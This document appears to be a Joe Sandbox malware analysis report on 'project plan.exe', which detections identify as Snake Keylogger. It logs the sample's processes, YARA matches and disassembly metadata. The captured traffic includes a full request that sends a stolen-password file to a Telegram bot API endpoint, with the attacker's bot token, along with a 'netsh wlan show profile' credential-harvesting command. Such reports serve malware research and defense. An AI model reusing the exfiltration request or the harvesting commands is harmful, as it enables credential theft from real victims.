                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704132.226.247.73806132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 3, 2024 09:27:59.150829077 CEST151OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                  Host: checkip.dyndns.org
                                  Connection: Keep-Alive
                                  Jul 3, 2024 09:27:59.836782932 CEST320INHTTP/1.1 200 OK
                                  Date: Wed, 03 Jul 2024 07:27:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 103
                                  Connection: keep-alive
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  X-Request-ID: 512dbe0845334fd3bec92b26f7f0c12a
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549711149.154.167.2204436132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-03 07:28:06 UTC352OUTPOST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6ea
                                  Host: api.telegram.org
                                  Content-Length: 534
                                  Connection: Keep-Alive
                                  2024-07-03 07:28:06 UTC534OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 62 31 30 32 36 39 34 61 36 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 31 30 36 34 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 33 2f 30 37 2f 32 30 32 34 20 2f 20 30 33 3a 32 37 3a 35 37 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                  Data Ascii: --------------------------8dc9b102694a6eaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:910646Date and Time: 03/07/2024 / 03:27:57Client IP:
                                  2024-07-03 07:28:06 UTC388INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Wed, 03 Jul 2024 07:28:06 GMT
                                  Content-Type: application/json
                                  Content-Length: 473
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  2024-07-03 07:28:06 UTC473INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 35 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 36 34 37 32 35 31 36 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 55 4d 5a 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 75 6d 7a 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 33 36 31 32 38 35 31 36 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 63 65 61 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 39 39 39 31 36 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79 70 65 22 3a
                                  Data Ascii: {"ok":true,"result":{"message_id":195676,"from":{"id":6064725165,"is_bot":true,"first_name":"BUMZY","username":"bumzy_bot"},"chat":{"id":5361285164,"first_name":"Ocean","type":"private"},"date":1719991686,"document":{"file_name":"SnakePW.txt","mime_type":


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:03:27:56
                                  Start date:03/07/2024
                                  Path:C:\Users\user\Desktop\project plan.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\project plan.exe"
                                  Imagebase:0x16754a40000
                                  File size:2'939'959 bytes
                                  MD5 hash:EC263CAFBD93FAEB218574586BF8E45F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:03:27:56
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:03:27:57
                                  Start date:03/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                  Imagebase:0x8e0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:4
                                  Start time:03:27:57
                                  Start date:03/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                  Imagebase:
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:7
                                  Start time:03:27:58
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
                                  Imagebase:0x7ff6ea340000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:03:28:04
                                  Start date:03/07/2024
                                  Path:C:\Windows\SysWOW64\netsh.exe
                                  Wow64 process (32bit):true
                                  Commandline:"netsh" wlan show profile
                                  Imagebase:0x1080000
                                  File size:82'432 bytes
                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:03:28:04
                                  Start date:03/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:13.3%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:6
                                    Total number of Limit Nodes:0
                                    execution_graph 10792 7ff848f134fa 10793 7ff848f13509 VirtualProtect 10792->10793 10795 7ff848f135e1 10793->10795 10800 7ff848f10921 10801 7ff848f1094f FreeConsole 10800->10801 10803 7ff848f109ce 10801->10803

                                    Executed Functions

                                    Function 00007FF848F10B3C Relevance: 7.6, Strings: 6, Instructions: 73COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ([if$0[if$8[if$@[if$H[if$P[if
                                    • API String ID: 0-2959431512
                                    • Opcode ID: 505e834bada02ca46ea646dd4ec208190717391466daf3c7aaab58b8c6225f90
                                    • Instruction ID: 30c5f9c39fbfa4c70e55180ae5b5ccabbc82f3077e259b96418c915aba175b5d
                                    • Opcode Fuzzy Hash: 505e834bada02ca46ea646dd4ec208190717391466daf3c7aaab58b8c6225f90
                                    • Instruction Fuzzy Hash: 6321C27550AA539FEBC8BB6490316B4B7A1FFA2311F4401BDC94B8B5C2CE1C2C46C742
                                    Function 00007FF848F11F30 Relevance: 2.0, Strings: 1, Instructions: 735COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 645 7ff848f11f30-7ff848f14b91 call 7ff848f14a50 652 7ff848f14bb4-7ff848f14bc3 645->652 653 7ff848f14b93-7ff848f14ba9 call 7ff848f14a50 call 7ff848f14aa0 652->653 654 7ff848f14bc5-7ff848f14bdf call 7ff848f14a50 call 7ff848f14aa0 652->654 663 7ff848f14bab-7ff848f14bb2 653->663 664 7ff848f14be0-7ff848f14c30 653->664 663->652 668 7ff848f14c3c-7ff848f14c73 664->668 669 7ff848f14c32-7ff848f14c37 call 7ff848f141f8 664->669 672 7ff848f14c79-7ff848f14c84 668->672 673 7ff848f14e6f-7ff848f14ed9 668->673 669->668 674 7ff848f14cf8-7ff848f14cfd 672->674 675 7ff848f14c86-7ff848f14c94 672->675 704 7ff848f14edb-7ff848f14ee1 673->704 705 7ff848f14ef6-7ff848f14f20 673->705 677 7ff848f14cff-7ff848f14d0b 674->677 678 7ff848f14d70-7ff848f14d7a 674->678 675->673 676 7ff848f14c9a-7ff848f14ca9 675->676 680 7ff848f14cab-7ff848f14cdb 676->680 681 7ff848f14cdd-7ff848f14ce8 676->681 677->673 684 7ff848f14d11-7ff848f14d24 677->684 682 7ff848f14d9c-7ff848f14da4 678->682 683 7ff848f14d7c-7ff848f14d89 call 7ff848f14218 678->683 680->681 689 7ff848f14d29-7ff848f14d2c 680->689 681->673 687 7ff848f14cee-7ff848f14cf6 681->687 688 7ff848f14da7-7ff848f14db2 682->688 699 7ff848f14d8e-7ff848f14d9a 683->699 684->688 687->674 687->675 688->673 692 7ff848f14db8-7ff848f14dc8 688->692 696 7ff848f14d2e-7ff848f14d3e 689->696 697 7ff848f14d42-7ff848f14d4a 689->697 692->673 695 7ff848f14dce-7ff848f14ddb 692->695 695->673 700 7ff848f14de1-7ff848f14e01 695->700 696->697 697->673 698 7ff848f14d50-7ff848f14d6f 697->698 699->682 700->673 710 7ff848f14e03-7ff848f14e12 700->710 707 7ff848f14f21-7ff848f14f75 704->707 708 7ff848f14ee3-7ff848f14ef4 704->708 721 7ff848f14f89-7ff848f14fc1 707->721 722 7ff848f14f77-7ff848f14f87 707->722 708->704 708->705 711 7ff848f14e5d-7ff848f14e6e 710->711 712 7ff848f14e14-7ff848f14e1f 710->712 712->711 717 7ff848f14e21-7ff848f14e58 call 7ff848f14218 712->717 717->711 727 7ff848f15018-7ff848f1501f 721->727 728 7ff848f14fc3-7ff848f14fc9 721->728 722->721 722->722 731 7ff848f15021-7ff848f15022 727->731 732 7ff848f15062-7ff848f1508b 727->732 728->727 730 7ff848f14fcb-7ff848f14fcc 728->730 733 7ff848f14fcf-7ff848f14fd2 730->733 734 7ff848f15025-7ff848f15028 731->734 736 7ff848f14fd8-7ff848f14fe5 733->736 737 7ff848f1508c-7ff848f150a1 733->737 734->737 738 7ff848f1502a-7ff848f1503b 734->738 739 7ff848f15011-7ff848f15016 736->739 740 7ff848f14fe7-7ff848f1500e 736->740 747 7ff848f150ab-7ff848f15131 737->747 748 7ff848f150a3-7ff848f150aa 737->748 741 7ff848f15059-7ff848f15060 738->741 742 7ff848f1503d-7ff848f15043 738->742 739->727 739->733 740->739 741->732 741->734 742->737 746 7ff848f15045-7ff848f15055 742->746 746->741 748->747
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: d
                                    • API String ID: 0-2564639436
                                    • Opcode ID: c4afe4fc847aea4b85a3f84a691f3befef9e329ebb75a5b2b35c852c9183f436
                                    • Instruction ID: 624368f825c74bb60121881ab86b0f4927366b0ab653fb180c9b137dd8b26646
                                    • Opcode Fuzzy Hash: c4afe4fc847aea4b85a3f84a691f3befef9e329ebb75a5b2b35c852c9183f436
                                    • Instruction Fuzzy Hash: 37223231A1CA4A4FE759EF2894815B177E2FFA5350F1442BAC45AC71D7EE28EC838784
                                    Function 00007FF848F14620 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 755 7ff848f14620-7ff848f14638 758 7ff848f1463a-7ff848f1464c 755->758 759 7ff848f1460e-7ff848f1461e 755->759 762 7ff848f1464e 758->762 763 7ff848f1464f-7ff848f1471e 758->763 759->755 762->763 774 7ff848f14724-7ff848f14781 763->774 775 7ff848f14996-7ff848f149c9 763->775 796 7ff848f14783-7ff848f14794 call 7ff848f14128 774->796 782 7ff848f149cb-7ff848f149d2 775->782 783 7ff848f149d3-7ff848f149d8 775->783 782->783 785 7ff848f149da-7ff848f149dc 783->785 786 7ff848f149dd-7ff848f149ee 783->786 785->786 789 7ff848f149f0-7ff848f149f2 786->789 790 7ff848f14a22-7ff848f14a51 786->790 792 7ff848f149fc-7ff848f14a02 789->792 793 7ff848f149f4-7ff848f149f7 call 7ff848f141f8 789->793 807 7ff848f14a54-7ff848f14a8a 790->807 794 7ff848f14a11-7ff848f14a21 792->794 795 7ff848f14a04-7ff848f14a10 792->795 793->792 795->794 802 7ff848f14799-7ff848f147b0 796->802 806 7ff848f14812-7ff848f14825 802->806 808 7ff848f147b2-7ff848f147da call 7ff848f12098 * 2 call 7ff848f120a0 806->808 809 7ff848f14827-7ff848f14829 806->809 807->807 810 7ff848f14a8c 807->810 833 7ff848f147dc-7ff848f147ef 808->833 812 7ff848f14882-7ff848f14895 809->812 814 7ff848f1482b-7ff848f14880 call 7ff848f12098 * 2 call 7ff848f10208 812->814 815 7ff848f14897-7ff848f14899 812->815 814->812 818 7ff848f1493e-7ff848f14951 815->818 821 7ff848f1489e-7ff848f148d0 call 7ff848f12098 818->821 822 7ff848f14957-7ff848f14995 818->822 830 7ff848f148ea-7ff848f148eb 821->830 831 7ff848f148d2-7ff848f148e8 821->831 835 7ff848f148ed-7ff848f1490c call 7ff848f11f30 830->835 831->835 837 7ff848f147f6-7ff848f14810 833->837 842 7ff848f14911-7ff848f14937 call 7ff848f14200 835->842 837->806 844 7ff848f1493c 842->844 844->818
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: fish
                                    • API String ID: 0-1064584243
                                    • Opcode ID: 70c6bcf84bb955f58d51e916ff22884945d4dde2631ce233cefe29480395e48d
                                    • Instruction ID: 9358803c2d262a19603c0ce0f41f42e0a4eacee7849c280f2b0254c4ad662b95
                                    • Opcode Fuzzy Hash: 70c6bcf84bb955f58d51e916ff22884945d4dde2631ce233cefe29480395e48d
                                    • Instruction Fuzzy Hash: 19F12731A1DB8A4FE75DAB3898251B577E1FFA6350F0401BED08AC76D3DE28AC068745
                                    Function 00007FF848F19680 Relevance: 1.1, Instructions: 1076COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23f145fd40d55c2d68b8edc255a102f4d446fb98b90eb8b95a666dfba2e7fbce
                                    • Instruction ID: e9bd238874f9e82d01d7fb51fdb71bcda8fa7daeb3a218849ed544e288938fec
                                    • Opcode Fuzzy Hash: 23f145fd40d55c2d68b8edc255a102f4d446fb98b90eb8b95a666dfba2e7fbce
                                    • Instruction Fuzzy Hash: EB72B130A1CA098FDBA8FB289455A7977E1FF59341F5401BEE44EC72D2DF28AC418B85
                                    Function 00007FF848F1BD90 Relevance: .4, Instructions: 444COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9660aa3a9a1f13299f44003ae2296e2f4d4c4d520b9484911db3f72c770f658
                                    • Instruction ID: 0d397862a172b6f64345fb3f4fdd155310d1ce2be2aa77f7c6c22b9576a3bf0e
                                    • Opcode Fuzzy Hash: e9660aa3a9a1f13299f44003ae2296e2f4d4c4d520b9484911db3f72c770f658
                                    • Instruction Fuzzy Hash: 2BD15D3191CB868FE31CDB288895175B7E2FF95341F18867ED4C6C32E5DB28A846CB85
                                    Function 00007FF848F1194D Relevance: .3, Instructions: 316COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b31d490880e3695af6cdfc642528cb8d5fb914316a57e9ec6c7b7085d2c80c1e
                                    • Instruction ID: 0762965a7d90283a1bbcab0a2b3b6ce5c015edd20866ca565271ffea63085780
                                    • Opcode Fuzzy Hash: b31d490880e3695af6cdfc642528cb8d5fb914316a57e9ec6c7b7085d2c80c1e
                                    • Instruction Fuzzy Hash: A691B230B1C9094FE758FB2894557F977E2EF98390F640479D40EC72D7EE29AC828649
                                    Function 00007FF848F105F0 Relevance: .3, Instructions: 309COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b53c441a5fbff2be9b7c95352ae2f4da6cc2d8d399b3bb837774de841dcd51e6
                                    • Instruction ID: 5451220dcff5c38bf3575d50b3d972d6444ae8c87d18a9b59160955e65f7d6a6
                                    • Opcode Fuzzy Hash: b53c441a5fbff2be9b7c95352ae2f4da6cc2d8d399b3bb837774de841dcd51e6
                                    • Instruction Fuzzy Hash: 6291B230B2C9094FE768FB2894557B973E6EF98381F544479D40EC72D3EF29AC828649
                                    Function 00007FF848F24F03 Relevance: .2, Instructions: 180COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61ac3255585d7373bd89d3de9bb8f283c8633ce0d52686dcc074d13270c54201
                                    • Instruction ID: 4303db53f3446fdb6197daabbf0e200476f1d14613134ae493f6e6c32fa67732
                                    • Opcode Fuzzy Hash: 61ac3255585d7373bd89d3de9bb8f283c8633ce0d52686dcc074d13270c54201
                                    • Instruction Fuzzy Hash: 5641053160D68A0FD31E9B3898261B57BA5EB83320B1582BFD4C7CB1E7DD19A84783D5
                                    Function 00007FF848F24F50 Relevance: .2, Instructions: 168COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7244faf19aff1df2c5d94f9dcccba2b3f4bc606f4520ba954c758a53cccb3876
                                    • Instruction ID: fbeccaf584f98c70c3dcaddb259f5dc51ae9106bd5cc58c0bff58ece553d09ac
                                    • Opcode Fuzzy Hash: 7244faf19aff1df2c5d94f9dcccba2b3f4bc606f4520ba954c758a53cccb3876
                                    • Instruction Fuzzy Hash: 6E41F63160D6890FD31EDB7888251A57FA5EB83310F1582BED4C7CB1E7DD28A80683D5
                                    Function 00007FF848F134FA Relevance: 1.6, APIs: 1, Instructions: 140memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1021 7ff848f134fa-7ff848f13507 1022 7ff848f13509-7ff848f13511 1021->1022 1023 7ff848f13512-7ff848f13523 1021->1023 1022->1023 1024 7ff848f1352e-7ff848f135df VirtualProtect 1023->1024 1025 7ff848f13525-7ff848f1352d 1023->1025 1029 7ff848f135e1 1024->1029 1030 7ff848f135e7-7ff848f1360f 1024->1030 1025->1024 1029->1030
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: eaefb768ff6a467a0bbe95ccc651be166be53d96a648f07ecbd86b2cdd204cf8
                                    • Instruction ID: 96adcacbbb4f7f2334630bca61df0aebd310f70279aaf6136dfc5963cb6c928d
                                    • Opcode Fuzzy Hash: eaefb768ff6a467a0bbe95ccc651be166be53d96a648f07ecbd86b2cdd204cf8
                                    • Instruction Fuzzy Hash: A8413B3090C7894FD719DB6898466E97FF1EF56321F0402AFD089D31D2CB686846C795
                                    Function 00007FF848F1D212 Relevance: 1.6, APIs: 1, Instructions: 111memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1208 7ff848f1d212-7ff848f286cf VirtualProtect 1212 7ff848f286d1 1208->1212 1213 7ff848f286d7-7ff848f286ff 1208->1213 1212->1213
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: bf7ff14a8920697df33d7eda6e179b5067f212f32e81f3bac10cd864b28923ef
                                    • Instruction ID: 101c209bf83ea44d36b22a52644a042be810b36967f0402bbca6e5a7b2a16a3a
                                    • Opcode Fuzzy Hash: bf7ff14a8920697df33d7eda6e179b5067f212f32e81f3bac10cd864b28923ef
                                    • Instruction Fuzzy Hash: 9431D63091CA1C9FDB18EF99D8466F97BE1EB55311F00422ED04AD3251CB7568468B95
                                    Function 00007FF848F10921 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1202 7ff848f10921-7ff848f109cc FreeConsole 1206 7ff848f109ce 1202->1206 1207 7ff848f109d4-7ff848f109fb 1202->1207 1206->1207
                                    APIs
